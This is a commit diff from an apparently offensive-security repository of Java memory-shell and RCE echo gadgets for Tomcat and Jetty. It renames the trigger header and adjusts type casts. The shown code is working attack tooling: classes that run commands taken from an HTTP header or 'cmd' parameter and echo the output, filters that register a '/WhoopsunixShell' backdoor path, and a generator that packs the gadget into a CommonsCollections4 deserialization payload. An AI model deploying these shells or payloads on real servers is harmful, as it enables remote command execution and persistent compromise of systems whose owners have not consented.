Whoopsunix
diff --git a/‎JavaClass.http
Lines changed: 74 additions & 0 deletions b/‎JavaClass.http
Lines changed: 74 additions & 0 deletions
diff --git a/‎MemShell.http
Lines changed: 0 additions & 45 deletions b/‎MemShell.http
Lines changed: 0 additions & 45 deletions
diff --git a/‎MemShellAndRceEcho/JakartaJettyDemo/src/main/java/org/example/jetty/gadget/JettyEcho.java
Lines changed: 5 additions & 5 deletions b/‎MemShellAndRceEcho/JakartaJettyDemo/src/main/java/org/example/jetty/gadget/JettyEcho.java
Lines changed: 5 additions & 5 deletions
diff --git a/‎MemShellAndRceEcho/JakartaTomcatDemo/src/main/java/com/demo/memshell/all/TomcatExecThreadListener.java
Lines changed: 1 addition & 1 deletion b/‎MemShellAndRceEcho/JakartaTomcatDemo/src/main/java/com/demo/memshell/all/TomcatExecThreadListener.java
Lines changed: 1 addition & 1 deletion
diff --git a/‎MemShellAndRceEcho/JavaxJettyDemo/src/main/java/org/example/jetty/gadget/JettyEcho.java
Lines changed: 1 addition & 1 deletion b/‎MemShellAndRceEcho/JavaxJettyDemo/src/main/java/org/example/jetty/gadget/JettyEcho.java
Lines changed: 1 addition & 1 deletion
diff --git a/‎MemShellAndRceEcho/JavaxJettyDemo/src/main/java/org/example/jetty/utils/PayloadMake.java
Lines changed: 2 additions & 1 deletion b/‎MemShellAndRceEcho/JavaxJettyDemo/src/main/java/org/example/jetty/utils/PayloadMake.java
Lines changed: 2 additions & 1 deletion
diff --git a/‎MemShellAndRceEcho/JavaxTomcatDemo/src/main/java/com/demo/echo/TomcatEcho.java
Lines changed: 5 additions & 5 deletions b/‎MemShellAndRceEcho/JavaxTomcatDemo/src/main/java/com/demo/echo/TomcatEcho.java
Lines changed: 5 additions & 5 deletions
diff --git a/‎MemShellAndRceEcho/JavaxTomcatDemo/src/main/java/com/demo/memshell/all/TomcatExecThreadListener.java
Lines changed: 1 addition & 1 deletion b/‎MemShellAndRceEcho/JavaxTomcatDemo/src/main/java/com/demo/memshell/all/TomcatExecThreadListener.java
Lines changed: 1 addition & 1 deletion
diff --git a/‎MemShellAndRceEcho/JavaxTomcatDemo/src/main/java/com/demo/memshell/exec/Tomcat6FilterThreadMS.java
Lines changed: 1 addition & 1 deletion b/‎MemShellAndRceEcho/JavaxTomcatDemo/src/main/java/com/demo/memshell/exec/Tomcat6FilterThreadMS.java
Lines changed: 1 addition & 1 deletion
diff --git a/‎MemShellAndRceEcho/JavaxTomcatDemo/src/main/java/com/demo/memshell/exec/TomcatFilterJMXMS.java
Lines changed: 1 addition & 1 deletion b/‎MemShellAndRceEcho/JavaxTomcatDemo/src/main/java/com/demo/memshell/exec/TomcatFilterJMXMS.java
Lines changed: 1 addition & 1 deletion
@@ -19,7 +19,7 @@
  * 7.x、8.x、9.x、10.x、11.x
  */
 public class JettyEcho {
-    private static String HEADER = "X-Token";
+    private static String HEADER = "Xoken";
     private static String PARAM = "cmd";
     public JettyEcho() {
         try {
@@ -51,14 +51,14 @@ public JettyEcho() {
                 if (response == null)
                     continue;
 
-                String header = (String) request.getClass().getDeclaredMethod("getHeader", String.class).invoke(request, HEADER);
-                String param = (String) request.getClass().getDeclaredMethod("getParameter", String.class).invoke(request, PARAM);
+                Object header = request.getClass().getDeclaredMethod("getHeader", String.class).invoke(request, HEADER);
+                Object param = request.getClass().getDeclaredMethod("getParameter", String.class).invoke(request, PARAM);
 
                 String result = null;
                 if (header != null) {
-                    result = exec(header);
+                    result = exec((String) header);
                 } else if (param != null) {
-                    result = exec(param);
+                    result = exec((String) param);
                 }
 
                 Object writer = response.getClass().getDeclaredMethod("getWriter").invoke(response);
 
@@ -14,7 +14,7 @@
  */
 public class TomcatExecThreadListener implements InvocationHandler {
 
-    private static String HEADER = "X-Token";
+    private static String HEADER = "Xoken";
     private static Object[] applicationEventListenersObjects;
     private static List applicationEventListeners;
     private static Boolean flag = false;
 
@@ -19,7 +19,7 @@
  * 7.x、8.x、9.x、10.x、11.x
  */
 public class JettyEcho {
-    private static String HEADER = "X-Token";
+    private static String HEADER = "Xoken";
     private static String PARAM = "cmd";
     public JettyEcho() {
         try {
 
@@ -4,6 +4,7 @@
 import me.gv7.tools.josearcher.entity.Keyword;
 import me.gv7.tools.josearcher.searcher.SearchRequstByBFS;
 import org.example.jetty.gadget.JettyEcho;
+import org.ppp.tools.encryption.B64;
 import org.ppp.tools.ser.CC4Generator;
 
 import java.util.ArrayList;
@@ -22,7 +23,7 @@ public static void cc4() throws Exception {
         CC4Generator cc4Generator = new CC4Generator();
         String payload = cc4Generator.make(msmClass);
         System.out.println(payload.length());
-        cc4Generator.makeFile(msmClass, "cc4.bin");
+        cc4Generator.makeFile(msmClass, "dev/JettyEcho.bin");
     }
 
     public void searchJetty() {
 
@@ -23,7 +23,7 @@
  * 9.0.65
  */
 public class TomcatEcho {
-    private static String HEADER = "X-Token";
+    private static String HEADER = "Xoken";
     private static String PARAM = "cmd";
 
     public TomcatEcho() {
@@ -56,14 +56,14 @@ public TomcatEcho() {
                     Object processor = processors.get(j);
                     Object req = getFieldValue(processor, "req");
                     Object response = req.getClass().getMethod("getResponse").invoke(req);
-                    String header = (String) req.getClass().getMethod("getHeader", String.class).invoke(req, HEADER);
+                    Object header = req.getClass().getMethod("getHeader", String.class).invoke(req, HEADER);
                     Object parameters = getFieldValue(req, "parameters");
-                    String param = parameters.getClass().getMethod("getParameter", String.class).invoke(parameters, PARAM).toString();
 
                     String result = null;
                     if (header != null) {
-                        result = exec(header);
-                    } else if (param != null) {
+                        result = exec((String) header);
+                    } else if (parameters != null) {
+                        String param = parameters.getClass().getMethod("getParameter", String.class).invoke(parameters, PARAM).toString();
                         result = exec(param);
                     }
 
 
@@ -14,7 +14,7 @@
  */
 public class TomcatExecThreadListener implements InvocationHandler {
 
-    private static String HEADER = "X-Token";
+    private static String HEADER = "Xoken";
     private static Object[] applicationEventListenersObjects;
     private static List applicationEventListeners;
     private static Boolean flag = false;
 
@@ -20,7 +20,7 @@ public class Tomcat6FilterThreadMS implements Filter {
 
     private static String NAME = "TomcatServletThreadMS";
     private static String pattern = "/WhoopsunixShell";
-    private static String header = "X-Token";
+    private static String header = "Xoken";
     private static HttpServletRequest request;
     private static HttpServletResponse response;
 
 
@@ -20,7 +20,7 @@ public class TomcatFilterJMXMS implements Filter {
 
     private static String NAME = "TomcatServletThreadMS";
     private static String pattern = "/WhoopsunixShell";
-    private static String header = "X-Token";
+    private static String header = "Xoken";
 
     public TomcatFilterJMXMS() {